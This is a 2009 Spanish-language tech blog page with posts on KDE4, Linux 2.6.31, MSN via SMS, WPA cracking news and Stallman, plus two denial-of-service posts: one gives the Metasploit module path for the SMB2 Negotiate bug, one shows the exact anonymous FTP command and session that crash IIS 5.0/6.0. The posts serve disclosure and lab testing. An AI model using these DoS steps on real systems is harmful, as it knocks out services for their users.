Buscar dentro de este blog

lunes, 21 de septiembre de 2009

KDE4 es WIndow$ 7?

Voy a compartir un videito en el cual los chicos de ZDNet Australia hacen un curioso experimento...

¿Qué ocurriría si salieras a la calle con KDE 4 y dijeras a la gente que es Windows 7?



Muchos lo creerian! :)

miércoles, 16 de septiembre de 2009

Exploiting SMB2 DoS

Continuando con el post publicado ayer por la noche acerca del bug SMB2 Negotiate, ahora voy a mostrarles paso a paso como exploté la vulnerabilidad en un entorno de prueba ;)

1- Descargué el auxiliary smb2_negotiate_pidhigh.rb para Metasploit
2- Cargué el auxiliary
3- Ejecute el exploit contra la IP de prueba 10.1.1.50

4- Pude visualizar como el host victima (Window$ Vista SP2) mostraba una pantalla azul de la muerte y se reiniciaba:



video

5- Luego del reinicio a causa del exitoso DoS :) Vista mostró una pantalla de error detallando lo susedido


Happy Hacking ;)

martes, 15 de septiembre de 2009

SMB2.0 NEGOTIATE DoS


El 8 de Septiembre, el researcher Laurent Gaffié descubrió una nueva vulnerabilidad -CVE-2009-3103- en el SMB2 Negotiate de los sistemas: Windows Vista, Windows Server 2008 y Windows 7 RC.

Recordemos que apartir de Windows Vista los sistemas de Microsoft utilizan una nueva version de SMB llamada SMB2.

Si bien Microsoft publicó este Advisory, aún no publicaron un fix. Hace 1 hora atrás Microsoft dijo que se esta trabajando en un parche para solucionar esto cuanto antes.

Para los que no contamos con el Immunity Canvas, HD Moore ya publicó un exploit para
Metasploit. Para poder utilizarlo deben actualizar el metasploit, descargar el auxiliary "smb2_negotiate_pidhigh.rb" y copiarlo en el directorio correspondiente. Luego utilizarlo [msf> use auxiliary/dos/windows/smb/smb2_negotiate_pidhigh] .

Pueden ver el código fuente del exploit ACA Happy Hacking :)

TOP 5 del Kernel 2.6.31


1. Soporte USB 3.0

Una de las mejoras más notables es que GNU/Linux se convierte en el primer sistema operativo en soportar el nuevo estándar USB de alta velocidad, hasta 600 Mbytes/s de transferencia máxima teórica, que por
diseño del bus se quedan en unos eficientes 350 Megabytes por segundo,
10 veces más que con USB 2.0.

2. Mejor rendimiento del sistema de escritorio

Debido a recientes cambios en el kernel, el sistema es capaz de
gestionar mejor las páginas de memoria manteniendo en la RAM los
programas que uses en este momento y evitando la paginación en SWAP de
los mismos. Ello quiere decir que las aplicaciones funcionarán de
manera más fluida al no requerir lecturas y escrituras del disco duro.
Varias pruebas de rendimiento han mostrado una mejora del orden del 50% frente a la versión anterior de kernel.

3. Mejoras de rendimiento en los sistemas de archivos

Gracias al uso de ACL (Access Control List) se consiguen lecturas de alrededor de un 3% más rápidas (en sistemas Ext), que si bien no suena
muy convincente, a la hora de arrancar un programa, ese porcentaje de
mejora sumado al resto hace que el resultado final sí que sea
notable.
Hay casos como el de gente que utiliza Oracle con sistema de ficheros
Btrfs, que notará una mayor mejora. De alrededor de un 15%.

4. Mejor soporte gráfico

En esta versión del kernel se han integrado muchas novedades entre las
que destacan Kernel Video Mode que mejorará el soporte para gráficas
Intel y ATI Radeon, con peor soporte que NVIDIA.
Esos cambios realizados prometen mayor estabilidad y rendimiento
gráfico en sistemas con tarjetas gráficas de esas familias.

5. Mejor soporte de red

De la misma manera que sucede con el punto anterior, hay grandes
novedades respecto al soporte hardware. El principal en el terreno de
redes es que Linux integra soporte en el propio kernel para múltiples tarjetas de red inalámbricas, como la futura de Intel Wi-Fi 802.11
3200. De momento no integra soporte nativo de Wi-Fi N, recién aprobado
como estándar. Pero gracias al ritmo de trabajo de los desarrolladores
para cuando los nuevos equipos de red con certificación oficial
lleguen al mercado, el kernel ya habrá integrado el mismo.

Información enviada por Sepa desde su lista ArLinux

sábado, 12 de septiembre de 2009

MSN via SMS


Desde ayer, Micro$oft anunció la disponibilidad de un nuevo servicio en Argentina (solo para clientes de Personal) que te permite chatear con tus contactos de MSN mediante mensajes SMS.
En principio está pensado para los usuarios que posean teléfonos de poca tecnología, que no puedan correr ningún cliente compatible con la red del MSN.

El proceso de registro es muy simple, pero el uso es bastante engorroso y los SMS no tienen ningún costo adicional.



Para registrarse tienen que ingresar en el sitio SMS para Windows Live Messenger, ahí tienen que loguearse con su Live ID e ingresar el número de teléfono que van a asociar a la cuenta. El sistema les enviará un código de confirmación a través de SMS, y ustedes tendrán que ingresarlo para confirmar que efectivamente son propietarios de la línea.

Una vez confirmado todo, podremos mostrarnos como disponibles en el sistema enviando un SMS con el comando “ON” al número que nos indican, y para ocultarnos enviamos el comando “OFF”. El sistema siempre nos confirmará luego de cada comando enviado, podemos agregar contactos y chatear con ellos desde el teléfono, sin necesidad de que ellos usen este sietema, pueden hablarte desde su computadora usando el Windows Live Messenger tradicional.

lunes, 7 de septiembre de 2009

{Humor} Videos de Sysadmins Freakys

ALMUERZO DE UN FREAKY:



PING DE LA EX:



CONSULTA EN HELP DESK:



TEARAPIA DE FREAKYS:

viernes, 4 de septiembre de 2009

MS IIS FTPD DoS 0DAY :D

Nikolaos Rangos acaba de publicar un exploit para explotar una
vulnerabilidad de DoS del servicio IIS FTPD.

Este exploit simple puede ser explotado por cualquier usuario
(incluso los "anonymous") que se conecten a un FTP vulnerable,
siempre y cuando tengan acceso de lectura en un directorio...

A continuación voy a mostrar una manera de provocar un DoS
accediendo con un usuario anonimo que tiene permiso de lectura
en el directorio "pub":

ftp 192.168.2.102 -> ftp server vulnerable
Verbindung mit 192.168.2.102 wurde hergestellt.
220 Microsoft FTP Service
Benutzer (192.168.2.102:(none)): anonymous -> usuario anonimo
331 Anonymous access allowed, send identity (e-mail name) as password.
Kennwort:
230 Anonymous user logged in.
ftp> ls "-R p*/../"
...
p*/../pub:
pub
...
p*/../pub:
pub
...
p*/../pub:
pub
...
p*/../pub:
pub
...
Remore Host has closed the connection. -> DoS exitoso :)

Este DoS se produce tras provocar un tipico "stack overflow"
(esto se puede corroborar debuggeando el servicio con el OllyDbg).

Lo mejor de todo es que este exploit afecta a las
versiones IIS 5.0 y 6.0
:D

miércoles, 2 de septiembre de 2009

WPA Cracking en menos de 60"

Hoy un researcher, de la Hiroshima University y Masakatu Morii of Kobe University, llamado Toshihiro Ohigashiha ha reportado un ataque que permite crackear WPA.

El ataque se basa en una vulnerabilidad conocida desde Noviembre 2008 pero que hasta hoy no tenia una explotación ;)

Los detalles de esta nueva tecnica serán expuestos en una conferencia técnica el 25 de Septiembre en Hiroshima. Pero se puede obtener más información sobre el ataque ACA

Stallman Censurado


La primeras palabras de Richard Stallman hacia el público marplatense que asistió al Teatro Diagonal fueron "UTN: Universidad Totalmente Necia".

Por qué dijo esto?

Porque la charla de Richard Stallman que estaba anunciada para realizarse en la facultad de la UTN Mar del Plata fue cancelada / censurada.

Los motivos argumentados fueron que la UTN tiene firmados varios acuerdos con Microsoft que imposibilitaban permitir una charla en la cual se criticase los productos, la metodología y la política de Microsoft...

En el sitio de la UTN simplemente se lee «Por motivos ajenos a esta Institución, nos vemos obligados a suspender la charla programada para el día Martes 1° de Septiembre de 2009.»